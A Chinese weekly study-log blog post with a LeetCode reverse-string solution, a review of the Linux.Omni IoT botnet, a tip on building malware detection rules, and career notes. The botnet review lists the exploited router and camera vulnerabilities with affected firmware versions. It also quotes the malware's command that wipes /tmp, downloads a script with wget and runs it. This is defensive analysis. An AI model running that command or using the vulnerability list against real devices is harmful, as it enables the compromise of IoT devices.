【ARTS】01_06_左耳听风-20181217~1223
ARTS:
- Algrothm: leetcode算法题目
- Review: 阅读并且点评一篇英文技术文章
- Tip/Techni: 学习一个技术技巧
- Share: 分享一篇有观点和思考的技术文章
Algorithm
【leetcode】Reverse String
https://leetcode.com/problems/reverse-string/
1)problem
编写一个以字符串作为输入并逆转字符串的函数。
2)answer
字符串大于0,就从最末尾开始取值。
3)solution
#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;class Solution {
public:string reverseString(string s) {string result = "";for (int i =s.length()-1;i>=0 ; i--){result += s.at(i);}return result;}
};int main()
{// 使用内容Solution nSolution;nSolution.reverseString("abcdef");
}
Review
【漏洞挖掘】Linux.Omni IoT 僵尸网络恶意软件分析
1)场景
Linux下针对IoT威胁的分类和分析。
2)问题难点
使用什么方式对IOT设备进行攻击。
3)解决问题的方法
Linux.Omni因其感染库包含了许多漏洞(总共11种)
4)方法细节
利用的IoT设备漏洞
- Vacron
VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。
- Netgear – CVE-2016-6277
通过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。
- D-Link – OS-Command Injection via UPnP
IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。
Omni的POST请求如下:
我们可以找到对应的二进制命令:
存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。
- CCTV-DVR
与“/language/Swedish”资源相关联,允许远程执行代码。
- D-Link – HNAP
通过CAPTCHA绕过登录,并允许外部攻击者执行远程代码。
D-Link路由器有此漏洞的版本:
DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA
- TR-069 – SOAP
漏洞利用如下:
二进制中的指令:
- Huawei Router HG532 – Arbitrary Command Execution
在华为HG532路由器中,可以通过修改HTTP请求来利用配置文件验证错误的漏洞。
此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。
- Netgear – Setup.cgi RCE
Netgear路由器DGN1000 1.1.00.48固件中存在允许远程执行代码而无需事先验证的漏洞。
- Realtek SDK
使用Realtek SDK和miniigd守护程序的不同设备都存在通过UPnP SOAP接口的命令注入漏洞。
- GPON
GPON路由器的最新漏洞
5)总结
尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
下载的文件是bash脚本,它依据受感染设备的不同构架来下载样本。
Tip
【安全开发】恶意代码检查工具1
1)场景
网络安全设备报警,某台机器中毒。
2)问题难点
如何快速找到机器里的恶意代码相关进程、文件。
3)解决思路
通过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。
4)方法细节
逆向分析收集到的样本,然后提取规则:
文件规则:文件路径、Yara规则
注册表:注册表路径、子项、类型、值
内存:内存特征码、内存类型、内存保护属性、内存块大小范围
遍历内存代码:
【恶意代码】恶意代码代码特征提取
https://www.cnblogs.com//17bdw/p/10181207.html
5)总结
只需要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。
Share
【业务能力】极客时间-左耳听风-开篇词1
1)场景
利用技术变现思路。
2)问题难点
在长时间加班情况下,如何保持学习。
3)解决思路
觉得还是要从头到尾看完一本书,不容易被分神。
白天工作回家就不想动了。
4)方法细节
【技术思路】极客时间-左耳听风-开篇词1
https://www.cnblogs.com/17bdw/p/10183216.html
5)总结
用技术变现:
独立思考
保持学习力、洞察力
寻找合适的环境
具备动手能力。
关注技术付费点
善于提升经验
输出价值观
朋友圈
拥有技术领导力
转载于:https://www.cnblogs.com/17bdw/p/10169603.html
【ARTS】01_06_左耳听风-20181217~1223相关推荐
- 左耳听风ARTS第2周
左耳朵耗子专栏<左耳听风> 用户自发每周完成一个ARTS: 1.Algorithm:每周至少做一个 leetcode 的算法题 2.Review:阅读并点评至少一篇英文技术文章 3.Tip ...
- 左耳听风 第二十一周
左耳听风 第二十一周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 《左耳听风》-ARTS-打卡记录-第二十五周
<左耳听风>-ARTS-打卡记录-第25周 坚持不懈是一句正确的废话.前段时间,我在我的读者群中发起了一个名为 ARTS 的活动.每人每周写一个 ARTS:Algorithm 是一道算法题 ...
- 左耳听风 第三十三周
左耳听风 第三十三周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 左耳听风 第三十八周
左耳听风 第三十八周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 左耳听风 第四十九周
左耳听风 第四十九周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 左耳听风 第四十一周
左耳听风 第四十一周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 左耳听风 第三十五周
左耳听风 第三十五周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
- 左耳听风 第四十二周
左耳听风 第四十二周 每周完成一个ARTS: 每周至少做一个 leetcode 的算法题.阅读并点评至少一篇英文技术文章.学习至少一个技术技巧.分享一篇有观点和思考的技术文章.(也就是 Algorit ...
最新文章
- poj3264 - Balanced Lineup(RMQ_ST)
- 【转】C# typeof()实例详解
- html2image api,图像标签_图像识别 Image_API参考_API_华为云
- spring boot中使用@Async失效
- 非对称性密钥加密 java 实例_JAVA实现非对称加密
- python均值滤波_opencv+python实现均值滤波
- 图像处理理论(一)——直方图、二值化、滤波基础
- 杭电oj2047-2049、2051-2053、2056、2058
- Linux下安装ActiveMQ
- Linux开机启动过程(7):内核执行入口点
- C#SQL注入检测——特别是对于旧版.NET代码
- Unity基础-图形渲染
- 软件测试之软件配置项测试
- Arduino入门-Arduino编程语言入门教程
- android 模拟器创建,Android模拟器的建立以及HelloWorld的编写
- 1.3 Go语言上手-高质量编程与性能调优实战
- html怎样写出x的平方,x的平方怎么打出来
- java未来发展潜力_Java语言未来是否还有发展前景
- CGAL 3D Demo展示
- 如何解决Redis缓存雪崩、击穿与穿透